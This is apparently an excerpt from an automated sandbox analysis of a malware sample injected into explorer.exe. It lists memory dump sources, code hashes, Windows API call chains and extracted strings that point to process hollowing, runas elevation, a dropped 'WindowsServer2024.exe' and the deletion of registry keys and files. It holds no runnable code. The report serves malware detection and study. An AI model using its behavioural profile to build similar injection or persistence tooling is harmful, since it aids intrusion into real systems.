• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 066845098519c5cfd41540883547bc2673087f9916ed1057274385ce232eb9ba
• Instruction ID: c1f29c0aac6beda0849fe06be852842039c9706aa404a5506b803bbaf64a81d4
• Opcode Fuzzy Hash: 066845098519c5cfd41540883547bc2673087f9916ed1057274385ce232eb9ba
• Instruction Fuzzy Hash: FED017B2619680C7F6788B01E050BAB7360F7C0700F401010E39642994CF3CCA84CE00
APIs
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: f9167c6025ceaf99fe249accd0e6505652e1a8aee71905078ff3a5cba5771e6b
• Instruction ID: c1f29c0aac6beda0849fe06be852842039c9706aa404a5506b803bbaf64a81d4
• Opcode Fuzzy Hash: f9167c6025ceaf99fe249accd0e6505652e1a8aee71905078ff3a5cba5771e6b
• Instruction Fuzzy Hash: FED017B2619680C7F6788B01E050BAB7360F7C0700F401010E39642994CF3CCA84CE00
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                             • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: bc4a491e1d895ba903ebd733a6c2b6428fd16bf76896332000bf1874532a21ec
                                                                            • Instruction ID: c1f29c0aac6beda0849fe06be852842039c9706aa404a5506b803bbaf64a81d4
                                                                            • Opcode Fuzzy Hash: bc4a491e1d895ba903ebd733a6c2b6428fd16bf76896332000bf1874532a21ec
                                                                            • Instruction Fuzzy Hash: FED017B2619680C7F6788B01E050BAB7360F7C0700F401010E39642994CF3CCA84CE00
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                             • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 60cf21f62d1dc145206f08a91dd1bba283ab904a53c73a5ec01a131829a1e1fa
                                                                            • Instruction ID: c1f29c0aac6beda0849fe06be852842039c9706aa404a5506b803bbaf64a81d4
                                                                            • Opcode Fuzzy Hash: 60cf21f62d1dc145206f08a91dd1bba283ab904a53c73a5ec01a131829a1e1fa
                                                                            • Instruction Fuzzy Hash: FED017B2619680C7F6788B01E050BAB7360F7C0700F401010E39642994CF3CCA84CE00
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                             • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: fa60f3a416112e8adcec0e53fd871012574ce522b2df7edb6f362fde096d8998
                                                                            • Instruction ID: c1f29c0aac6beda0849fe06be852842039c9706aa404a5506b803bbaf64a81d4
                                                                            • Opcode Fuzzy Hash: fa60f3a416112e8adcec0e53fd871012574ce522b2df7edb6f362fde096d8998
                                                                            • Instruction Fuzzy Hash: FED017B2619680C7F6788B01E050BAB7360F7C0700F401010E39642994CF3CCA84CE00
                                                                            APIs
                                                                            • setsockopt.WS2_32 ref: 00BEAB8A
                                                                            • SetEvent.KERNEL32 ref: 00BEABFF
                                                                              • Part of subcall function 00BF7DA0: lstrlenW.KERNEL32 ref: 00BF7DEC
                                                                            • wnsprintfW.SHLWAPI ref: 00BEAC32
                                                                            • RegDeleteKeyExW.ADVAPI32 ref: 00BEAC50
                                                                            • wnsprintfW.SHLWAPI ref: 00BEAC83
                                                                            • RegDeleteKeyExW.ADVAPI32 ref: 00BEACA1
                                                                            • wnsprintfW.SHLWAPI ref: 00BEACD4
                                                                            • RegDeleteKeyExW.ADVAPI32 ref: 00BEACF2
                                                                            • wnsprintfW.SHLWAPI ref: 00BEAD25
                                                                            • RegDeleteKeyExW.ADVAPI32 ref: 00BEAD43
                                                                              • Part of subcall function 00BEF370: RegOpenKeyW.ADVAPI32 ref: 00BEF390
                                                                              • Part of subcall function 00BEF370: RegDeleteValueW.ADVAPI32 ref: 00BEF3A6
                                                                              • Part of subcall function 00BEF370: RegCloseKey.ADVAPI32 ref: 00BEF3B1
                                                                              • Part of subcall function 00BEF370: RegOpenKeyW.ADVAPI32 ref: 00BEF3D3
                                                                              • Part of subcall function 00BEF370: RegDeleteValueW.KERNEL32 ref: 00BEF3E9
                                                                              • Part of subcall function 00BEF370: RegCloseKey.ADVAPI32 ref: 00BEF3F4
                                                                              • Part of subcall function 00BF05B0: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00BE4277), ref: 00BF05CB
                                                                              • Part of subcall function 00BF05B0: SHGetKnownFolderPath.SHELL32 ref: 00BF05EF
                                                                              • Part of subcall function 00BF05B0: DeleteFileW.KERNEL32 ref: 00BF0625
                                                                              • Part of subcall function 00BF05B0: CoTaskMemFree.COMBASE ref: 00BF0630
                                                                              • Part of subcall function 00BF05B0: LocalFree.KERNEL32 ref: 00BF063B
                                                                              • Part of subcall function 00BF05B0: SHGetKnownFolderPath.SHELL32 ref: 00BF0652
                                                                              • Part of subcall function 00BF05B0: LocalAlloc.KERNEL32 ref: 00BF066A
                                                                              • Part of subcall function 00BF05B0: LocalAlloc.KERNEL32 ref: 00BF06B2
                                                                              • Part of subcall function 00BF05B0: DeleteFileW.KERNEL32 ref: 00BF06FD
                                                                              • Part of subcall function 00BF05B0: RemoveDirectoryW.KERNEL32 ref: 00BF0708
                                                                              • Part of subcall function 00BF05B0: LocalFree.KERNEL32 ref: 00BF0713
                                                                              • Part of subcall function 00BF05B0: LocalFree.KERNEL32 ref: 00BF071E
                                                                              • Part of subcall function 00BF05B0: CoTaskMemFree.COMBASE ref: 00BF0729
                                                                              • Part of subcall function 00BEFD90: CoInitializeEx.COMBASE ref: 00BEFDC0
                                                                              • Part of subcall function 00BEFD90: CoUninitialize.COMBASE ref: 00BF01C3
                                                                              • Part of subcall function 00BF0330: OpenEventW.KERNEL32 ref: 00BF0351
                                                                              • Part of subcall function 00BF0330: SetEvent.KERNEL32 ref: 00BF0372
                                                                              • Part of subcall function 00BF0330: CloseHandle.KERNEL32 ref: 00BF0380
                                                                              • Part of subcall function 00BF0330: OpenMutexW.KERNEL32 ref: 00BF03A0
                                                                              • Part of subcall function 00BF0330: WaitForSingleObject.KERNEL32 ref: 00BF03C6
                                                                              • Part of subcall function 00BF0330: CloseHandle.KERNEL32 ref: 00BF03D4
                                                                              • Part of subcall function 00BF0330: SHGetKnownFolderPath.SHELL32 ref: 00BF03EE
                                                                              • Part of subcall function 00BF0330: LocalAlloc.KERNEL32 ref: 00BF0406
                                                                              • Part of subcall function 00BF0330: lstrlenW.KERNEL32 ref: 00BF0467
                                                                              • Part of subcall function 00BF0330: GetFileAttributesW.KERNEL32 ref: 00BF04F3
                                                                              • Part of subcall function 00BF0330: LocalFree.KERNEL32 ref: 00BF0543
                                                                              • Part of subcall function 00BF0330: CoTaskMemFree.COMBASE ref: 00BF0551
                                                                              • Part of subcall function 00BF0330: wnsprintfW.SHLWAPI ref: 00BF057E
                                                                              • Part of subcall function 00BF0330: RegDeleteKeyExW.ADVAPI32 ref: 00BF0596
                                                                              • Part of subcall function 00BF01E0: SHGetKnownFolderPath.SHELL32 ref: 00BF01F8
                                                                              • Part of subcall function 00BF01E0: LocalAlloc.KERNEL32 ref: 00BF0210
                                                                              • Part of subcall function 00BF01E0: lstrlenW.KERNEL32 ref: 00BF0262
                                                                              • Part of subcall function 00BF01E0: GetFileAttributesW.KERNEL32 ref: 00BF02CA
                                                                              • Part of subcall function 00BF01E0: LocalFree.KERNEL32 ref: 00BF030B
                                                                              • Part of subcall function 00BF01E0: CoTaskMemFree.COMBASE ref: 00BF0316
                                                                              • Part of subcall function 00BEF790: SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,00BF67C4), ref: 00BEF7AF
                                                                              • Part of subcall function 00BEF790: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,00BF67C4), ref: 00BEF7C3
                                                                              • Part of subcall function 00BEF790: wnsprintfW.SHLWAPI ref: 00BEF7FC
                                                                              • Part of subcall function 00BEF790: lstrlenW.KERNEL32 ref: 00BEF80B
                                                                              • Part of subcall function 00BEF790: CoTaskMemFree.COMBASE ref: 00BEF81D
                                                                            • GetFileAttributesW.KERNEL32 ref: 00BEAE29
                                                                            • SHFileOperationW.SHELL32 ref: 00BEAE48
                                                                            • LocalFree.KERNEL32 ref: 00BEAE79
                                                                            • GetWindowsDirectoryW.KERNEL32 ref: 00BEAF37
                                                                            • CreateProcessW.KERNEL32 ref: 00BEB00A
                                                                            • GetCurrentProcess.KERNEL32 ref: 00BEB019
                                                                            • DuplicateHandle.KERNEL32 ref: 00BEB06B
                                                                            • GetCurrentProcess.KERNEL32 ref: 00BEB07A
                                                                            • DuplicateHandle.KERNEL32 ref: 00BEB0CB
                                                                            • LoadLibraryW.KERNEL32 ref: 00BEB0E2
                                                                            • GetProcAddress.KERNEL32 ref: 00BEB120
                                                                            • GetProcAddress.KERNEL32 ref: 00BEB13E
                                                                            • lstrcpyW.KERNEL32 ref: 00BEB15C
                                                                            • lstrcpyA.KERNEL32 ref: 00BEB172
                                                                            • lstrcpyA.KERNEL32 ref: 00BEB188
                                                                            • lstrcpyA.KERNEL32 ref: 00BEB19E
                                                                            • lstrcpyA.KERNEL32 ref: 00BEB1B4
                                                                            • lstrcpyA.KERNEL32 ref: 00BEB1CA
                                                                            • lstrcpyA.KERNEL32 ref: 00BEB1DD
                                                                            • lstrcpyW.KERNEL32 ref: 00BEB1F3
                                                                            • lstrcpyW.KERNEL32 ref: 00BEB209
                                                                            • LocalFree.KERNEL32 ref: 00BEB2D2
                                                                            • CloseHandle.KERNEL32 ref: 00BEB2F7
                                                                            • CloseHandle.KERNEL32 ref: 00BEB305
                                                                            • TerminateProcess.KERNEL32 ref: 00BEB31F
                                                                            • LocalFree.KERNEL32 ref: 00BEB32D
                                                                            • OpenEventW.KERNEL32 ref: 00BEB341
                                                                            • SetEvent.KERNEL32 ref: 00BEB362
                                                                            • CloseHandle.KERNEL32 ref: 00BEB370
                                                                            • shutdown.WS2_32 ref: 00BEB383
                                                                            • closesocket.WS2_32 ref: 00BEB391
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                             • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Deletelstrcpy$CloseHandle$AllocFilewnsprintf$EventFolderKnownOpenPathTask$Processlstrlen$Attributes$AddressCurrentDirectoryDuplicateProcValue$CreateInitializeLibraryLoadMutexObjectOperationRemoveSingleTerminateUninitializeWaitWindowsclosesocketsetsockoptshutdown
                                                                            • String ID: %s%s$2$SOFTWARE\%s$Software\%s$Software\%s$Software\%s$WindowsServer2024$WindowsServer2024.exe$h${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}${70F925A9-13A6-49C0-913B-C685A8E9B495}${C2AC4D96-85E6-4EFA-B33C-9FC0845F6FAD}${D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 1118244034-1152069612
                                                                            • Opcode ID: 23aa255290207a63e2cf2737ff0bb318f956b8098ee3f5e525695e48c5fffa12
                                                                            • Instruction ID: bbb3766f659e7fb58020c60e6f41286200d7485b54822b392157e46d485fd28d
                                                                            • Opcode Fuzzy Hash: 23aa255290207a63e2cf2737ff0bb318f956b8098ee3f5e525695e48c5fffa12
                                                                            • Instruction Fuzzy Hash: 8642D436218BC595E771DB14E8A87DBB3A4F788755F900226D68D43BA8EF7CC648CB40
                                                                            APIs
                                                                            • GetCommandLineW.KERNEL32 ref: 00BEE8C7
                                                                            • CommandLineToArgvW.SHELL32 ref: 00BEE8DC
                                                                            • lstrcmpiW.KERNEL32 ref: 00BEE8F7
                                                                            • lstrcmpiW.KERNEL32 ref: 00BEE91D
                                                                              • Part of subcall function 00BE5AD0: GetModuleFileNameW.KERNEL32 ref: 00BE5AFE
                                                                              • Part of subcall function 00BE5AD0: _LDint.LIBCPMTD ref: 00BE5B15
                                                                              • Part of subcall function 00BE5AD0: CreateFileW.KERNEL32 ref: 00BE5B93
                                                                              • Part of subcall function 00BE5AD0: WriteFile.KERNEL32 ref: 00BE5BF0
                                                                              • Part of subcall function 00BE5AD0: CloseHandle.KERNEL32 ref: 00BE5C13
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                             • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CommandLinelstrcmpi$ArgvCloseCreateDintHandleModuleNameWrite
                                                                            • String ID: shellcode${04D458D6-7C6C-445F-AEAD-313D698F1F0A}${4042FD4A-C237-4861-80BD-1FA24BEF8CE4}${427F0CCF-AF45-4A71-8E02-4FC2A2D64E46}${741330C7-73F4-49B6-9258-6679317DED46}${9A30B3AA-5D5B-4418-94BC-EA9A5585D123}${CCEFB138-B038-41E1-AC53-171A4E58AB6A}${F064C698-006D-4351-BA2C-625A53964F8D}${F6FB16F6-69D4-4502-9E85-2E5E52F61D5C}${F95B00D0-572A-45B1-BD9B-5DB7078A4AC4}
                                                                            • API String ID: 3070626111-596044211
                                                                            • Opcode ID: 7c865470e0464a453324e7636fbae510bfa24f6739339a5ff32697ba5d3373e2
                                                                            • Instruction ID: d8271b7dd54fb51b8732101fd5a5a550720d4fad77f146ff5b2f8058aa1ca8e4
                                                                            • Opcode Fuzzy Hash: 7c865470e0464a453324e7636fbae510bfa24f6739339a5ff32697ba5d3373e2
                                                                            • Instruction Fuzzy Hash: 7EB11C31204E8482F714DB66E8A876E73E1F7C8B91F605625E65A877A8DF7CC488D700
                                                                            APIs
                                                                            • setsockopt.WS2_32 ref: 00BEA460
                                                                            • SetEvent.KERNEL32 ref: 00BEA4CF
                                                                            • LocalAlloc.KERNEL32 ref: 00BEA50A
                                                                            • wnsprintfW.SHLWAPI ref: 00BEA54F
                                                                            • LocalAlloc.KERNEL32 ref: 00BEA55F
                                                                            • lstrcpyW.KERNEL32 ref: 00BEA58C
                                                                            • LocalAlloc.KERNEL32 ref: 00BEA5B5
                                                                            • lstrcpyW.KERNEL32 ref: 00BEA5E1
                                                                            • CoInitializeEx.COMBASE ref: 00BEA660
                                                                            • ShellExecuteExW.SHELL32 ref: 00BEA675
                                                                            • GetLastError.KERNEL32 ref: 00BEA682
                                                                            • CoUninitialize.COMBASE ref: 00BEA699
                                                                            • LocalAlloc.KERNEL32 ref: 00BEA6E2
                                                                            • wnsprintfW.SHLWAPI ref: 00BEA733
                                                                            • CreateProcessW.KERNEL32 ref: 00BEA7A2
                                                                            • OpenEventW.KERNEL32 ref: 00BEA7C7
                                                                            • SetEvent.KERNEL32 ref: 00BEA7E8
                                                                            • CloseHandle.KERNEL32 ref: 00BEA7F6
                                                                            • LocalFree.KERNEL32 ref: 00BEA804
                                                                            • LocalFree.KERNEL32 ref: 00BEA812
                                                                            • OpenEventW.KERNEL32 ref: 00BEA828
                                                                            • SetEvent.KERNEL32 ref: 00BEA849
                                                                            • CloseHandle.KERNEL32 ref: 00BEA857
                                                                            • LocalFree.KERNEL32 ref: 00BEA865
                                                                            • LocalFree.KERNEL32 ref: 00BEA873
                                                                            • LocalFree.KERNEL32 ref: 00BEA881
                                                                            • LocalFree.KERNEL32 ref: 00BEA88F
                                                                            • shutdown.WS2_32 ref: 00BEA89F
                                                                            • closesocket.WS2_32 ref: 00BEA8AA
                                                                              • Part of subcall function 00BEFBA0: CreateDirectoryW.KERNEL32 ref: 00BEFBD8
                                                                              • Part of subcall function 00BEFBA0: GetLastError.KERNEL32 ref: 00BEFBE3
                                                                              • Part of subcall function 00BEFBA0: LocalAlloc.KERNEL32 ref: 00BEFBFE
                                                                              • Part of subcall function 00BEFBA0: CreateFileW.KERNEL32 ref: 00BEFC6E
                                                                              • Part of subcall function 00BEFBA0: GetLastError.KERNEL32 ref: 00BEFC79
                                                                              • Part of subcall function 00BEFBA0: LocalFree.KERNEL32 ref: 00BEFD16
                                                                              • Part of subcall function 00BEFBA0: LocalFree.KERNEL32 ref: 00BEFD21
                                                                              • Part of subcall function 00BEF510: SHGetKnownFolderPath.SHELL32 ref: 00BEF587
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF59A
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF5B5
                                                                              • Part of subcall function 00BEF510: LocalAlloc.KERNEL32 ref: 00BEF5DC
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF620
                                                                              • Part of subcall function 00BEF510: CoTaskMemFree.COMBASE ref: 00BEF635
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                             • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$Event$CreateErrorLastlstrlen$CloseHandleOpenlstrcpywnsprintf$DirectoryExecuteFileFolderInitializeKnownPathProcessShellTaskUninitializeclosesocketsetsockoptshutdown
                                                                            • String ID: "%s%s"$"%s%s" %s$@@$WindowsServer2024.exe$h$p$runas${427F0CCF-AF45-4A71-8E02-4FC2A2D64E46}${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}${F064C698-006D-4351-BA2C-625A53964F8D}
                                                                            • API String ID: 852330099-763692919
                                                                            • Opcode ID: c0e811617835f277e743a61c36cfd185c99e4cdd70c3a92dedbbbdc4c413d21c
                                                                            • Instruction ID: ca02ce148374af9aabace0a7bd83888a5ec170256942377d5894edc124a7f08d
                                                                            • Opcode Fuzzy Hash: c0e811617835f277e743a61c36cfd185c99e4cdd70c3a92dedbbbdc4c413d21c
                                                                            • Instruction Fuzzy Hash: 3BC1B536218AC186E770DB15F4A87DEB3A4F788754F504226DA8E43BA8DF7CC589CB01
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Section$View$CloseUnmap$Process$CreateCurrentThread$ContextHandle$ResumeTerminate
                                                                            • String ID: @$@$h
                                                                            • API String ID: 2911138354-1939477041
                                                                            • Opcode ID: 0e9cbf2f4c6151c413ac656ea9fe00880fd01cba0e98bc66d04b8f41cef37c28
                                                                            • Instruction ID: ad4c50d249857427ca307e0a3b76862e5927224e9a2da2106d813de5b8d8998d
                                                                            • Opcode Fuzzy Hash: 0e9cbf2f4c6151c413ac656ea9fe00880fd01cba0e98bc66d04b8f41cef37c28
                                                                            • Instruction Fuzzy Hash: F5D19F76118AC086E770DF15F4A879EB7A1F3C8794F504225EA8A83B68DF7DC598CB40
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __doserrno_errno_invalid_parameter_noinfo
                                                                            • String ID: U
                                                                            • API String ID: 3902385426-4171548499
                                                                            • Opcode ID: 26d7c4cfa49adc4cd658d17e3e0790a6ca28b03908bebd92be2b82887c9fcb7c
                                                                            • Instruction ID: bf95555fa261bd9e398427ca8bbeefb6110853ebd25d8fc175ad0a2c676ecef0
                                                                            • Opcode Fuzzy Hash: 26d7c4cfa49adc4cd658d17e3e0790a6ca28b03908bebd92be2b82887c9fcb7c
                                                                            • Instruction Fuzzy Hash: 9B02F333314A8586EB308F25E4943AA7761F789B44F54412AEB9947BA9DF3DC58BCB00
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: EventExitThreadUser$AsyncCloseHandleObjectOpenSingleSleepStateWaitlstrlen
                                                                            • String ID: 2${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}
                                                                            • API String ID: 4137407306-4117667122
                                                                            • Opcode ID: 555e6d94e05c87790594ac9a0f30c17685f3254bc8a297b2fa6ae3024f6cd553
                                                                            • Instruction ID: d43a386809a09ea592d43dc7534989f04e3f5e98dbfb03794c53047598f5ac59
                                                                            • Opcode Fuzzy Hash: 555e6d94e05c87790594ac9a0f30c17685f3254bc8a297b2fa6ae3024f6cd553
                                                                            • Instruction Fuzzy Hash: 31817F76209BC499EB71CB10F4947EAB3A8F789354F50422AD68D53B69EF3CC198CB44
                                                                            APIs
                                                                            • _set_error_mode.LIBCMT ref: 00C0E8D1
                                                                            • _set_error_mode.LIBCMT ref: 00C0E8E2
                                                                            • GetModuleFileNameW.KERNEL32 ref: 00C0E944
                                                                              • Part of subcall function 00C0A834: GetCurrentProcess.KERNEL32(?,?,?,?,00C0A8D6), ref: 00C0A84C
                                                                            • GetStdHandle.KERNEL32 ref: 00C0EA59
                                                                            • WriteFile.KERNEL32 ref: 00C0EAB6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
